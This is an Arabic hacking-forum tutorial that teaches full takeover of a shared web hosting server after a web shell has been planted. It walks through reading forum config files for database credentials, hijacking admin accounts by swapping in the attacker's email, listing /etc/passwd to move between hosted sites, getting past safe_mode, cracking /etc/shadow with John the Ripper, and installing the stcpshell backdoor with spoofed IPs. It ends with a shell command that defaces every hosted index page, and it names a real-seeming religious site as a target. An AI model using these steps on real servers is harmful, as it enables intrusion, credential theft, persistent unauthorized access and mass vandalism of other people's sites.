ثامناً ::: السيطرة الكاملة على السيرفر , واختراق جميع المواقع الموجودة علي هذا السيرف - منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG | Dz-SeC Team |

yasMouh · 14/06/2010, 00:41

ثامناً ::: السيطرة الكاملة على السيرفر , واختراق جميع المواقع الموجودة علي هذا السيرفر ...

بعد ما تعرفنا علي كيفية البحث عن الثغرات , وكيفية رفع الشل , وكيفية استخدامه ..... وووو

والســـــــــؤال !!! هل هذه هي فائدة الشل فقط ؟؟؟

يعني أرفع ملفات وأحذفها ووو فقط

الجواب !!! طبعــــــاً لا ...

وإذا كان هدفي هو اختراق هذا الموقع [] ... وقمت بالبحث عن ثغرات لهذا الموقع ... ولم أجد أي ثغرة ...

فهل معني ذلك أن أنسي هذا الموقع ... الإجابة ... طبعــــــــــــــاًاااا لا ولا ولا ولا...

طيب ازاي نستفيد أكتر من الشل ؟؟؟ ,,,

وكيف نقوم باختراق الموقع المطلوب بالظبط ,,,....

وأيضاً !!! تخيل ... بإمكانك اختراق جميع المواقع اللى علي السيرفر عن طريق الشل ....

تـــــــــــابع ....

ازاي يا عم الهاكر......

أقولك ....

أولاً ::: يلزمك []

::: الهـــدف من موضوع السيطرة علي السيرفر بالكامل عن طريق الشل هـــو :::

1_ السيطره على السيرفر بالكامل (يعني كل المواقع اللي على السيرفر + السيرفر نفسه تحت أمرك).

2_ السيطره على الموقع المراد اختراقه بالتحديد فقط .

3_ السيطره على جميع البرامج الموجودة على الموقع.

4_ نسخ البيانات ....

طبعــــاً ... المفروض إنك دلوقتي علي الشل Shell ....

السيطره على الموقع ... يعني تقدر تتحكم وتدخل على الكنترول بانل للموقع وتتحكم في الموقع بالكامل والتعديل والتنفيذ والقراءه على الملفات....

الان تعالو معي للعملي ,,, طبعاً زي ما قلنا إنت الآن داخل الشل ,,,

وبعد ماتروح للمجلد الرئيسي للموقع وهو عادة public_html , أو www

بعد ماتكون في هذا المجلد اللي هو واجهه الموقع بتجد المجلدات كلها قدامك ,, مثلا تبغا تستهدف المنتدى vBulletin

تدخل المجلد تبع برنامج المنتدي وغالباً يكون مجلد البرنامج vb أو forum نكتب cd vb أو cd forum وتحصل مسارك على السيرفر مثلاً صار...

/home/example/public_html/vb

يعني صرت وسط مجلد المنتدى الحين تدور على ملف الكونفج config.php لهذا البرنامج ,,,

وملف الكونفج تبع هذا النوع من المنتديات يوجد تحت مجلد includes

إذاً ندخل هذا المجلد وبتحصل ملف الكونفج موجود من ضمن الملفات...

تستعرضه عن طريق الامر cat config.php أو تضغط عليه اذا كان الشل اللي إنت شغال عليه هو c99

,,, بعد ماتستعرض البيانات اللي فيه بتحصل كلمه المرور واليوزر للقاعده تبع هذا البرنامج ,,,

كالآتي :::

::: لنفترض إنك اخترقت موقع ورفعت عليه شل C99 Shell :::

التطبيق الآن بيكون على شل ch99 ::: وأنت بداخل المجلد الرئيسي للموقع ....

والآن أنت حصلت على اسم القاعدة , واليوزر , والباسورد ... كده أوكي , وتمام أوي ....

طيب ازاي ... تتحكم وتدخل على الكنترول بانل للموقع وتتحكم في الموقع بالكامل وتعدل وتنفذ وتقرأ الملفات....

.........................

طبعاً البيانات المطلوبة فى الصورة السابقة ... أكيد إنت حفظتها ... وهي الخاصة بملف الكونفيج config.php ...

- فى خانة Username هتكتب ( الاسم ==> زي اللي فى الصورة )

- فى خانة Password هتكتب ( الباسورد ==> زي اللي فى الصورة )

- فى خانة Database هتكتب ( اسم القاعدة ==> زي اللي فى الصورة )

واضغط علي Connect للاتصال بقاعدة البيانات....

وبعدهــــــــــــــا ...... ستظهر الصفحة الخاصة بقاعدة البيانات ....

نختار منها ..... مجلد المستخدمين users :::

وبعد كده هيظهر قدامك كل مستخدمين الموقع ومن ضمنهم الأدمن اللي هو بالغالب بيكون رقم 1

استدبل الأميل بأميلك عشان تطلبه عند تسجيل الدخول بشكل نسيان كلمة المرور ...

ويجيلك الباسورد على الإيمل يركض مو مشفر وبدون تعب.....

*******

الآن يهمنا .... كيف ننسخ البيانات ؟؟؟

,,,,,,,,,,,,,,,,,,,,,,,

وأيضـــــاً ... ممكن تدخل تتصفح قواعد البيانات , ومجلد الأعضاء ... عن طريق []

طبعاً ... إنت دلوقتي معاك بيانات الـ DataBase قاعدة البيانات بتاع الموقع ( الموجودة فى ملف الـ config.php )

قم برفع ملف [] على السيرفر أو الموقع الذي قمت باختراقه... ( طبعاً أكيد إنت عارف إزاي ترفع أي ملف )

ونقوم بفتحه من علي السيرفر ...

وستظهر لك هذه الشاشة...

اضغط علي Table أمام اسم القاعدة ( وطبعاً اسم القاعدة إنت عرفته من ملف الـ config.php ) لعرض القاعدة...

نضغط علي Data أمام الجدول المطلوب فتحه أو معرفة ما بادخله...

ونحن هنا فتحنا جدول users ( مستخدمين الموقع " سواء الإداريين أو أعضاء عاديين " )

وإذا أدرت أن تعرف بيانات عضو معين وكلمة السر الخاصة به ... اضغط علي Edit علي يمين الجدول أما العضو الذى تريد أن تعرف بياناته...

وطبعاً ممكن تضغط علي Edit الموجودة أمام Root أو Admin لمعرفة بيانات الأدمن ... وتصبح إنت الأدمن... كالآتي :::

وروح للمنتدي سوي استعاده كلمه المرور وحط إيميلك ويجيك الباسورد علي إيميلك...

أو غير الباسورد حقه لأي باسورد مشفر عندك ,,,

وبعدها ادخل المنتدي ببيانات الأدمن , وادخل على لوحة التحكم : Contol Panal ... ووو والباقي أعتقد إنتوا عارفينه...

*******************

********

*

فاكر الكلمتين دول ... اللي قلناهم فى أول الموضوع ...

وإذا كان هدفي هو اختراق هذا الموقع [] ... وقمت بالبحث عن ثغرات لهذا الموقع ... ولم أجد أي ثغرة ...

فهل معني ذلك أن أنسي هذا الموقع ... الإجابة ... طبعــــــــــــــاًاااا لا ولا ولا ولا...

والآن !!! كيف نقوم باختراق الموقع المطلوب بالظبط ,,,....

مع العلم أن الموقع لايوجد به ثغرات ( كما ذكرنا فى الأول ) ؛؛؛ ( وعلي ما أعتقد إنه مفيش موقع مفهوش ثغرات )...

وأيضــاً ... بإمكانك اختراق جميع المواقع اللى علي السيرفر عن طريق الشل ....

* أولاً ::: نفتكر كده مع بعض .... المعلومة دي .... *

الموقع عبارة عن مساحه على سيرفر ... يعني :::

السيرفر يحتوي علي العديد من المواقع ...

مثلاً ::: سيرفر العاصفه هوست ...

عليه موقع العاصفه , وموقع المشاغب , وموقع إسلاميات ,وموقع الشيعه دوت كم ...

وإذا كنت تريد أن تصل إلي موقع الشيعة وتسيطر عليه ,,,

اول شي تروح لموقع []

وتضع اسم الموقع بعده ...

[]

بيظهر لك اسم المستضيف والمعلومات ( من و إلى ),,, ومن ضمنها رقم الـ IP

اضغط على رقم الـ IP بيطلع لك المواقع اللي على السيرفر ...

مثل كذا ...
3asfh.com
absba.com
aslamyat.com

طيب انت فحصت موقع الشيعة ووجدت إنه لايوجد به ثغرات ... وطبعاً !!! إنت عرفت المواقع اللي على السيرفر ,,,

انتقل الى المشاغب مثلا وافحصه والعاصفه , وإسلاميات ... بعدها وجدت ثغره في المشاغب مثلا ,,,

ادخل الى هذي الثغرة وطبقها ... وبعد تطبيق الثغرة علي منتديات المشاغب مثلاً ... والحصول علي الـ Root ... بإمكانك السيطرة علي باقي

المواقع اللي عـ السيرفر ... وطبعاً من ضمنهم موقع الشيعة المراد اختراقه مثلاً ( اللي إحنا ما لقينا له ثغرة بالأول ... )....

-------------------------------

نكمــــــــــــــــــــــــــل موضوعنا :::

كــالآتــــــــــــــــــــــــــــي!!!

* طبعاً إنت اخترقت موقع معين من المواقع اللي عـ السيرفر ... وأصبحت Root علي السيرفر , وتريد السيطرة علي الموقع المطلوب .... *

ثانياً ::: لابد أن نعرف جميع أسماء مستخدمين المواقع اللي على السيرفر ... كالآتي :::

لأظهار يوزرات المواقع...

* وإنت داخل الـ Shell علي الموقع الذى قمت باختراقه ... * قم بعمل الآتي :::

اكتب الأمر هذا في سطر الأوامر ...

etc/passwd

الناتج...

جميل جداً جداً...

ابحث عن يوزر الموقع المطلوب ولنفرض هذا هو يوزر الموقع

sevede

الأن رح ننتقل للموقع المطلوب اختراقه عن طريق اليوزر!

لنفرض أننا الآن على هذا الموقع ...

واليوزر هو nadjaros

استبدل اليوزر بيوزر الموقع المطلوب اختراقه ...

اللي هو فرضاً sevede

يعني بشكل نهائي بعد استبداله بيكون كذا

الآن اضغط Go

النتيجه بتكون دخولك للموقع المطلوب اللي ما لقينا عليه ثغره بالأول !!!!!!

وبعدها ....... قم بتنفيذ الكلام اللي قلناه فوق ...

تروح تشوف ملف الـ config.php ... وبعدها تدخل علي SQL وتكتب البيانات اللى أخذتها من ملف الـ config.php

وتدخل على users وتشوف ملف الأدمن ... وتعدله ... وتقوم بتغيير إيميله إلي إيميلك ... وتطلبه من المنتدي عن طريق النسيان...

ووووووووو والباقي إنتو عارفينه ...

... أو ...

تروح ترفع ملف [] علي أي مجلد يقبل الرفع يعني تصريحه 777 يعني كذا مكتوب drwxrwxrwx ,,, أو ترفعه علي نفس المجلد...

اللي إنت رفعت عليه الشل قبل كده ......

وبعدها تفتح ملف mysql.php وووو

وبعدها اضغط علي Table أمام اسم القاعدة ( وطبعاً اسم القاعدة إنت عرفته من ملف الـ config.php ) لعرض القاعدة.

وادخل على جدول الـ Users وشوف ملف الأدمن وعدل بياناته , وغير إيميله لإيميلك , واطلبه من المنتدي عن طريق النسيان...

وبيجيلك الباسورد على طبق من فضة ... بدون مشاكل ...

!!!!!!!!!!!!!!!!!

ولــــــــــــــــكـــــــــــــن !!!

في موضوعنا هذا رح نضع كل الأحتمالات...

أول مشكله يمكن تواجهك عدم تمكنك من قرائة ...

etc/passwd

هل هذا يعني كل الي شرحناه فوق من كيفية الحصول على اليوزر ووووو

مامنه فايده؟

الجواب هو لاااااااااا لا لا لا لا

فيه أكثر من طريقة ... ورح أشرح كيفية الحصول على اليوزر...

من ثغرة الـ php ... اللي طارة بسببها مواقع وسيرفرات لخطورتها ...

[]

بعد تحميل السكربت وفك الضغط ورفعه على الموقع الذي تم اختراقه ...

نفذ الأمر التالي :::

مباشره بعد رابط السكربت مثال...

file=/etc/passwd؟[]

الموقع = رابط السكريبت هو www.xxxx.com/nn.php

الأمر هو file=/etc/passwd؟

الناتج بيكون :::

بعد الحصول على اليوزر ... أكمل الشرح اللي فوق ...

!!!!!!!!!!!!!!!!!

الآن تخطينا أول مشكلة اللي ممكن تواجه الكثير ...

والآن في مشكلة ثانية ... وهي ... احتمال تواجهك !!!!

اللي هي safemode on

السيف مود شغال

طيب والحل؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

الحل اللي أعرفه إن ثغرة الـ php تقدر منها تقرأ كونفج المنتدى !@!

سؤال: أولا كيف أقرأ ملف الكونفج وايش استفيد منه بعد القرائه ؟

الجواب: لقراءة ملف الكونفج ...

احصل على يوزر الموقع أولاً ...

ثانيا

اكتب

file="/home/NooFa/public_html/vb/includes/config.php?

مباشرة بعد عنوان السكربتwww.xxxx.com/nn.php

علماً بأن Noofa هو يوزر الموقع الأفتراضي...

بعد قراءة ملف الكونفج ظهر امامنا يوزر وباسورد قاعدة بيانات المنتدى

بعد الحصول على معلومات الكونفج من يوزر وباسورد

مباشرة ارفع أي سكربت يتصل بقاعدة البيانات...

وشرحنا بيكون على السكربت الروسي RST ( [] )

بعد ادخال البيانات واكمال الخطوه رقم 3

رح تظهر عندك كل قواعد البيانات على السيرفر...

ابحث عن المنتدى المطلوب وفي الصوره شرح افتراضي

بعد اختيار القاعده المطلوبه والدخول لها

رح تظهر أمامك كل الجداول

اختار جدول template

بعد الدخول ابحث عن FORUMHOME

اذا ملقيته في الصفحه الرئيسيه توجه للي بعدها

شوف الصوره ...

انتقل وانتقل وانتقل إلي أن تجد FORUMHOME

ومبروك عليك المنتدى بلا safemode on ولا خربوطه هنيئا لك احلى اختراق....

وعلي فكرة ممكن والله أعلم استخدام سكريبت mysql " اللي شرحناه قبل كده " فى تخطي السيف مود وووو

***********************

وإليكــم تطبيق شامل ... عن كيفية الاستفادة من السيطرة علي السيرفر!!!

((( التطبيق عـ اللينكس )))

المهــــــــــم !!!

وبعد ما وجدت الثغرة المناسبة وطبقتها وأصبح لك صلاحيات root على السيرفر ... ايه اللي المفروض تعملو بعد كده ؟!

كتير من الهاكرز ذوي الخبرة البسيطة في انظمة التشغيل يقوم بتنفيذ الثغرات على الانظمة ويعرفو يوصولو الى الروت .. لكن بعد مايدخل السيرفر ميعرفش ايه اللي مفروض يعملو او ايه الخطوة اللي بعد كده وده نتيجة لقلة معرفته بالنظام

أول حاجه تعملها لما تدخل السيرفر ... انك تشوف مين شغال عليه حاليا وبيعملو ايه ومين اخر ناس كانت على السيرفر . الموضوع بيتم عن طريق اوامر بسيطة كالتالي :

كود:

$        who -H -u
      NAME     LINE         TIME         IDLE          PID COMMENT
      mood     tty1         Oct  7        7:24  00:51               2881
      rony     pts/0        Oct  7        8:2    .                  3041 (:0.0)
      omar     pts/1        Oct  7 14:28 00:01               3041 (:0.0)

استخدمنا امر who لمعرفة الموجودون على السيرفر حاليا وهم : mood , rony , omar

لو تحب المستخدمين بيعملو ايه على السيرفر يبئى تستخدم امر w كالتالي :

كود:

$ w
       15:17:12  up 53 min,  3 users,  load average: 0.23, 0.11, 0.05
      USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
      mood     tty1     -                       7:24pm 52:15   1.06s  0.01s  /bin/sh
      rony     pts/0    :0.0                    8:2pm   0.00s  1.87s         0.01s  telnet
      omar     pts/1    :0.0                    4:28pm 19.00s  0.19s  0.16s  vim       deatiles.txt

نستطيع رؤية مايفعله المستخدمين حاليا على السيرفر .. فـ mood واقف على الشيل ولا يقوم بشيء , بينما rony تسستخدم telnet و omar يستخدم محرر viلتحرير ملف deatiles.txt

تمام لحد هنا , طيب لو حابب اعرف اخر من دخل على السيرفر وامتى علشان استنتج ايه ظروف الحركة على السيرفر ... يعني هل اخد حريتي ولا ؟ ... خلونا نجرب last :

كود:

                                 $        last
      omar     pts/1        :0.0             Tue Oct         7 14:28   still logged in
      rony     pts/0        :0.0             Tue Oct         7 14:25   still logged in
      mood     tty1                          Tue Oct         7 14:24   still logged in
      reboot   system boot  2.4.20-8         Tue Oct  7 14:24          (00:53)
      root     pts/1        :0.0             Tue Oct  7 09:03 - 09:15  (00:11)
      mood     pts/0        :0.0             Tue Oct         7 09:03 - 09:15  (00:11)
      tornido  tty1                          Tue Oct         7 09:03 - down   (00:13)
      reboot   system boot  2.4.20-8         Tue Oct  7 09:02          (00:13)
      task     pts/0        :0.0             Mon Oct         6 09:46 - crash  (23:16)
      root     tty1                          Mon Oct  6 09:09 - crash  (23:53)
      reboot   system boot  2.4.20-8         Mon Oct  6 09:08         (1+00:07)
      lycos    pts/0        :0.0             Sat Oct         4 03:31 - down   (15:57)
      rony     pts/2        :0.0             Sat Oct         4 03:07 - 03:30  (00:23)
      root     pts/1        dial36-28.sbm.ne Sat Oct  4 02:48 - 03:24  (00:36)
      master   pts/0        :0.0             Sat Oct         4 02:47 - 03:15  (00:27)
      root     tty1                          Sat Oct  4 02:44 - down   (16:44)
      reboot   system boot  2.4.20-8         Sat Oct  4 02:43          (16:44)
      tornido  pts/0        :0.0             Fri Oct         3 23:27 - down   (01:06)
      mood     tty1                          Fri Oct         3 23:26 - down   (01:07)
      reboot   system boot  2.4.20-8         Fri Oct  3 23:25          (01:08)
      root     tty1                          Fri Oct  3 23:19 - down   (00:04)
      reboot   system boot  2.4.20-8         Fri Oct  3 23:19          (00:05)
      tornido  pts/0        :0.0             Fri Oct         3 22:46 - down   (00:01)
      root     tty1                          Fri Oct  3 21:52 - down   (00:54)
      reboot   system boot  2.4.20-8         Fri Oct  3 21:52          (00:55)
      master   pts/0        :0.0             Fri Oct         3 04:45 - down   (00:49)
      root     tty1                          Fri Oct  3 04:43 - down   (00:51)
      reboot   system boot  2.4.20-8         Fri Oct  3 04:42          (00:51)
      reboot   system boot  2.4.20-8         Fri Oct  3 03:52          (01:42)

طبعا اللي يهمني بعد كده اني اقدر ادخل السيرفر بالطريقة العادية وليس بتطبيق الثغرة .. لانه احتمال المدير يرقع الثغرة ولن استطيع تطبيقها على السيرفر مرة اخرى .. طبعا اي حد هايقول علشان ادخل تاني يبئى لازم احصل على كلمات المرور الصحيحة , وممكن واحد تاني يقول نركب باكدور يسهل الدخول الى السيرفر مرة اخرى . والطريقتين صحيحتين , وان شاء الله اشرحهم الاتنين .. ولنبدء بالحصول على الباسوردات...

كما ذكرنا سابقا ان الباسوردات تتوفر في ملف etc/shadow/ ولكنها تكون بصورة مشفرة . في انظمة لينيكس ونظام سولاريس غالبا مايكون نوع التشفير DES , و DES هو تشفير بقوة 56 بت من فصيلة التشفير المتماثل او symmetric algorithm ويمكن كسره بسهوله , اما في نظام FreeBSD و التوزيعات الجديدة لانظمة لينيكس يكون التشفير من نوع MD5 وهو تشفير بقوة 128 بت يصعب كسره , وفي انظمة OpenBSD يتم استخدام تشفير من نوع BlowFish .

كما يوجد انواع اخرى من التشفير كـ MD4 , SHA-l , AES , IDEA , Triple DES , RSA

ولحسن الحظ انه تتوفر اداة John The Ripperعلى انظمة يونيكس وتستطيع كسر معظم انواع التشفير المعروفة , وهي التي سنستخدمها في كسر تشفير الباسوردات الموجوده في ملف shadow .

اول حاجه نزل البرنامج .. بس خلي بالك مش تنزلو على السيرفر الي تم اختراقه , انت تاخد نسخة من ملف shadow اللي على السيرفر وتحطها في جهازك المحلي وتنزل اداة John The Ripperعلى جهازك :

كود:

   [root@Net-Spider root]# wget http://www.openwall.com/john/john-1.6.tar.gz

بعد كده تبدء عملية install للأداة , بعد ماتفك ضغط الملف توجه الى فولدر src وقم بكتابة امر make ثم Enterليتم عرض قائمة بالتركيبات الخاصة لانظمة التشغيل المختلفة .. واذا لم تستطع تحديد نوع التركيبة المناسبة لنظام تشغيلك .. قم بعمل امر make generic وستقوم الاداة بتخمين التركيبة المناسبة كالتالي :

كود:

  
                                 [root@Net-Spider root]# tar        zxf john-1.6.tar.gz
      [root@Net-Spider root]# cd john-1.6
      [root@Net-Spider john-1.6]# cd src
      [root@Net-Spider src]# make generic

بعد ماتعمل امر make generic هاتبدء عملية التثبيت , وبعد ماتنتهي سيتكون ملف تنفيذي اسمه johnفي فولدر run .. وخلي بالك ان احيانا تتم عملية installبطريقة غير صحيحة اذا حددت تركيبة لنظام اخر غير نظامك الحالي .. وللتأكد ان عملية install تمت بنجاح قم بعمل الامر test :

كود:

                                   [root@Net-Spider src]# cd ../run
[root@Net-Spider run]# ls
all.chr    digits.chr  john.ini    mailer        unafs   unshadow
alpha.chr  john        lanman.chr  password.lst  unique
[root@Net-Spider run]# ./john -test
Benchmarking: Standard DES [24/32 4K]... DONE
Many salts:     168832 c/s real, 170479 c/s virtual
Only one salt:  157188 c/s real, 157188 c/s virtual
        
                Benchmarking: BSDI DES (x725) [24/32 4K]... DONE
Many salts:     5967 c/s real, 6000 c/s virtual
Only one salt:  5934 c/s real, 5934 c/s virtual
        
                Benchmarking: FreeBSD MD5 [32/32]... DONE
Raw:    2412 c/s real, 2423 c/s virtual
        
                Benchmarking: OpenBSD Blowfish (x32) [32/32]... DONE
Raw:    241 c/s real, 241 c/s virtual
        
                Benchmarking: Kerberos AFS DES [24/32 4K]... DONE
Short:  149974 c/s real, 150620 c/s virtual
Long:   306116 c/s real, 306116 c/s virtual
        
                Benchmarking: NT LM DES [24/32 4K]... DONE
Raw:    875630 c/s real, 878381 c/s virtual

اتأكد ان نتيجة الاختبار طلعت زي النتيجة في المثال السابق او على الاقل نوع التشفير اللي انت عاوزه يكون مكتوب جنبه DONE . بعد كده تبئى انت جاهز لاستخدام johnبكل حرية . طبعا انت خدت نسخة من ملف shadow اللي على السيرفر وحطيتها على جهازك المحلي .. ولنفرض انك حطيتها على المسار التالي في جهازك...

/root/shadow

اذا هانستخدم اداة johnفي فك تشفير باسورد الروت اللي موجوده في الملف .. واللي ديما بتكون في اول سطر من الملف , وانت عليك تاخد السطر ده ثم تنشىء ملف في مجلد run وتضع الباسورد المشفره به .. انظر الى الخطوات التي قمت بها :

كود:

[root@Net-Spider run]# head        -1 /root/shadow
      root:$1$Qjtxzgis$eUnbZU7MIZjoOIcALHGqW.:12331:0:99999:7:::
      [root@Net-Spider run]# pwd
      /root/john-1.6/run
      [root@Net-Spider run]# head -1 /root/shadow >        /root/john-1.6/run/passwd
      [root@Net-Spider run]# ./john passwd
      Loaded 1 password (FreeBSD MD5 [32/32])
      guesses: 0  time: 0:00:00:05 9% (2)  c/s: 2456  trying: Raven1
      guesses: 0  time: 0:00:00:07 13% (2)  c/s: 2339  trying: refrus
      guesses: 0  time: 0:00:00:09 16% (2)  c/s: 2274  trying: CONRAD
      guesses: 0  time: 0:00:00:11 20% (2)  c/s: 2233  trying: salut!
      guesses: 0  time: 0:00:00:13 23% (2)  c/s: 2204  trying: ranger7
      guesses: 0  time: 0:00:00:15 27% (2)  c/s: 2183  trying: help5
      guesses: 0  time: 0:00:00:17 30% (2)  c/s: 2167  trying: robin8
      guesses: 0  time: 0:00:00:19 33% (2)  c/s: 2155  trying: testtest0
      guesses: 0  time: 0:00:00:21 37% (2)  c/s: 2144  trying: grant?
      guesses: 0  time: 0:00:00:23 45% (2)  c/s: 2136  trying: PommePomme
      guesses: 0  time: 0:00:00:25 48% (2)  c/s: 2129  trying: Snottub
      guesses: 0  time: 0:00:00:27 52% (2)  c/s: 2123  trying: 2beavis
      guesses: 0  time: 0:00:00:29 56% (2)  c/s: 2118  trying: 4public
      guesses: 0  time: 0:00:00:31 59% (2)  c/s: 2113  trying: Grandma!
              ...

في المثال السابق قمت بأنشاء ملف passwd ولك الحرية في اختيار اي اسم , ثم قمت بوضع الباسورد المشفرة به وخليت البرنامج يبدء في فك التشفير .. وكما تشاهدون ان اداة johnاوضحت بأن الباسورد مشفرة بتشفير من نوع MD5 الخاص بأنظمة FreeBSD وبدأءت في تطبيق الاحتمالات .. وطبعا الوقت الذي تستغرقه الاداة في فك التشفير ممكن يكون ساعة او يوم او اسبوع او اكثر ... حسب عدة عوامل وهي :

قوة الباسورد : ونعني بقوة الباسورد هو تركيبها وطولها , اي ان الباسورد ( password ) ستأخذ وقت اقل في فك التشفـير من الباســورد ( p4$$w00rd1 )
نوع التشفير : وهو الميكانيكية التي تم بها تشفير الباسورد , فمثلا تشفير DES يتم فك تشفيره بصورة أسرع من تشفير MD5
مواصفات الـ pc : وده عامل مهم جدا .. حيث ان قوة فك التشفير تعتمد على سرعة الـ prossecor والـ RAM .. فكلما كان جهازك ذو مواصفات وسرعة اعلى كان اسرع في فك التشفير .

اذكر اني اردت اثبات ضعف التشفير من نوع DES وامكانية كسره .. حيث قمت بأستخدام 13 اجهزة Pentium3 بقوة رامات 128 في احد الشبكات للعمل سويا في كسر تشفير DES , ونجحت في كسر التشفير بعد استغراق 8 ساعات . فلو اني اعتمدت على جهاز واحد في فك التشفير فسيأخذ من الوقت 13 ضعف الوقت الذي استغرقته اي 104 ساعة! . ولذلك يقوم بعض الهاكرز بتثبيت اداة johnعلى السيرفر الذي تم اختراقه وذلك لانه عادة تكون السيرفرات ذات مواصفات اعلى من الاجهزة العادية , لكن المشكلة ان اداة johnعندما يتم تشغيلها لكي تقوم بفك التشفير فهي تستهلك كل موارد السيرفر .. وسيشعر الادمن ببطء في اداء السيرفر ومن هنا يمكنه اكتشاف الجريمة .

مشكلة اخرى وهي الوقت , فأعتقد انها عملية شاقة لكي تترك جهازك يعمل اسبوع كامل متواصل في فك التشفير .. مع انه يمكنك وقف الاداة ثم عمل restoreللعملية في وقت لاحق , الا انه مازال يعتبر عمل شاق .. فأذا قمت بتشغيل johnفلن تستطيع اداء مهام اخرى على جهازك , لذا انا اقترح ان تجعل جهاز اخر يقوم بهذه العملية ولكن بصورة شرعية ... كيف ؟!

يمكنك شراء Shell Account على سيرفر ذو مواصفات قوية .. ثم تثبيت اداة john على الاكاونت الخاص بك وجلعها تقوم بكسر تشفير الباسورد المطلوبة ثم قم بوضع العملية في الـ Background واقفل الشيل .. ولما تفتكر بعد اسبوع ولا اتنين .. ادخل الشيل وطلع الباسورد المشفره جاهزة بدون عناء ولا تعب

المهم بعد مايتم كسر التشفير ستقوم اداة johnبأنشاء ملف بأسم john.pot توضع به الباسورد الحقيقية بعد كسر تشفيرها , حيث تستطيع الدخول بها الى السيرفر .. وبكده يبئى انتهينا من موضوع كسر التشفير......

***

ننتقل الان الى موضوع الـ Backdoors وده يعتبر موضوع كبير لدرجة انك ممكن تجد كتب كاملة تشرح الـ Backdoors .. ولكن انا هنا في موضوعي سأتناول شرح مبسط خالي من التعقيد .

طبعا اكيد عارفين برامج الباكدور على ويندوز مثل subsevenو netbus وغيرهم من برامج الاطفال دي .. لكن في عالم لينكس فأن الباكدور يأخذ اتجاها اخر .. فله انواع مختلفة .. فمثلا النوع الشائع عبارة عن باكدور يعطيك شيل على النظام لتدخل على السيرفر بدون يوزر او باسورد .. وهناك نوع اخر من الباكدورز يثبت نفسه في نواة النظام حيث يجعل النظام كله تحت سيطرتك وليس مجرد وصول الى النظام ويمكن لهذا النوع من الباكدور ان يقوم بأضرار كبيرة للنظام ... لذا سنتناول في موضوعنا هنا النوع الاول

.

فيه اداة باكدور بسيطة جدا عبارة عن كود كتبه واحد اسمه |CyRaX| واسم الاداة stcpshell . اول شيء قم بتحميل الاداة على السيرفر وعلى جهازك المحلي من على الرابط :

[]

بعد ماتنزل الملف على السيرفر الذي تم اختراقه اعمل له Compile ثم قم بتشغيل الاداة كالتالي :

كود:

                                  $ gcc -o stcpshell        stcpshell.c
              $        ./stcpshell -s
      Starting as server.
      Local Port: 4321  Remote Port: 1234
      Local IP: , Faked IP: 207.46.131.137
      Backdoor on non connected/spoofed tcp. Coded by |CyRaX|. []
      Members of Packets Knights Crew ! www.programmazione.it/knights
      Running in server mode. Forking and waiting for the data

كما تلاحظون ان الاداة قامت بفتح البورت رقم 4321 في السيرفر والـ Remote port الذي ستقوم بالاتصال من خلاله هو 1234 , والـ IP المزور هو 207.46.131.137 .

ويمكنك تغير هذه الارقام الخاصة بالمنافذ او الاي بي المزور على مزاجك ...

وهذا هو الامر الكامل لعملية تثبيت الباكدور اذا حبيت تغير الارقام :

./stcpshell -s -sp [port] -cp [port] -fi [ip]

sp = Server port

cp = client port

fi = fake IP

كما يمكنك تغيير القيم الافتراضية لارقام المنافذ عن طريق التعديل على الكود في الملف .. وهو ليس بالشيء الصعب

بعد ذلك سنقوم بتثبيت stcpshell في جهازي المحلي .. ولكن سأقوم بالتعديل في امر الـ Compile لاني سأستخدمها كـ Client وليس Server كالتالي :

[root@Net-Spider run]# gcc -static -o stcpshell stcpshell.c

بعد ذلك سأقوم بالاتصال على السيرفر اللي ركبت فيه stcpshell في وضع server كالتالي :

كود:

                                 [root@Net-Spider root]# ./stcpshell        -c -sp 4321 -cp 1234 -si kw10.net -ci       62.139.160.89
      Starting as Client
      Local Port: 1234  Remote Port: 4321
      Local IP: 62.139.160.89         Server IP: 64.191.4.9  Faked IP: 207.46.131.137
      Backdoor on non connected/spoofed tcp. Coded by |CyRaX|. []
      Members of Packets Knights Crew ! www.programmazione.it/knights
      Running in client mode. Sending data to 127.0.0.1.
      [email protected] # pwd
      /root
      [email protected] # head -1 /etc/shadow
      root:$1$Qjtxzgis$eUnbZU7MIZjoOIcALHGqW.:12331:0:99999:7:::
      [email protected] # Fuck All The World       _|_ lol

في المثل السابق استخدمت stcpshell للاتصال بالسيرفر .. بدون يوزر او باسوورد .. حيث قمت بتحديد البورت المصدر والهدف .. وقامت الاداة بتزوير الاي بي الخاص بي , وكما ترون انه اصبح لي root access على السيرفر . هناك Tools اخرى للباك دور , ولكن اعتقد ان هذه الاداة مناسبة للكثير منكم .

والان وبعد ان قمنا بفرض سيطرتنا على السيرفر نبدء نشوف اهدافنا

. فأذا كان الهدف هو web serverفأعتقد ان هدفك سيكون التلاعب بالموقع او الحصول على معلومات حساسة ومهمة كـ قاعدة بيانات لأحد المنتديات او اي اهداف اخرى .. ولكن يجب ان نفهم شجرة النظام اولا لكي نستطيع الوصول بسهولة الى مانريد .

هذه رسمة بسيطة تشرح بناء نظام ملفات Unix :

root level root
(/)
------------------------------|---------------------------------------------------
| | | | | | | | |
/etc /dev /tmp /lib /usr /root /bin /var /home
| _____|_____
passwd | |
/Silent /NetSpider
________________________|_______________
| | | | | |
.profile /mail /pers /games /bin /michelle
| __|______ | __|_______
capital | | data | |
othello starwars letter letter1

فأذا كان السيرفر هو web serverفستجد ملفات الموقع في مجلد var/www/html/ , اما اذا كان السيرفر يقدم خدمة web hosting اي انه يوجد على السيرفر اكثر من موقع فستجد هذه المواقع في مجلد home/حيث ستجد لكل موقع مجلد في home/ , وكثيرا مايكون السيرفر هو محطة عمل ضمن شبكة .. وستجد هنا الدليل usr/الذي يحتوي على المستخدمين.

فأذا كنت ممن يقومو بتغيير صفحات Index للمواقع فعليك ان تجد هذه الصفحات على المسار :

/home/SiteName/public_html/index.htm

فأذا اخترقت webserver عليه مثلا 100 موقع ... وحبيت تغير جميع صفحات index الخاصة بهم .. فاختصر الوقت وقم بتنفيذ الامر التالي :

$ echo Hacked By MyName > /home/*/public_html/index.*

ولكن اعتقد ان ده شيء مش كويس ... هل انت كل غرضك من اختراق السيرفر هو تشويه المواقع وتغيير الصفحة الاولى فقط مع انك يمكن حتى متعرفش عناوين المواقع دي!!

لو ده هدفك و في اعتقادك انك كده وصلت للقمة ...فأنت لسه موصلتش للمستوى المطلوب لكي يطلق عليك كلمة هاكر.

كيف تستفيد من سيطرتك على احد السيرفرات في شبكة تعمل بها العديد من الاجهزة على انظمة يونيكس ...

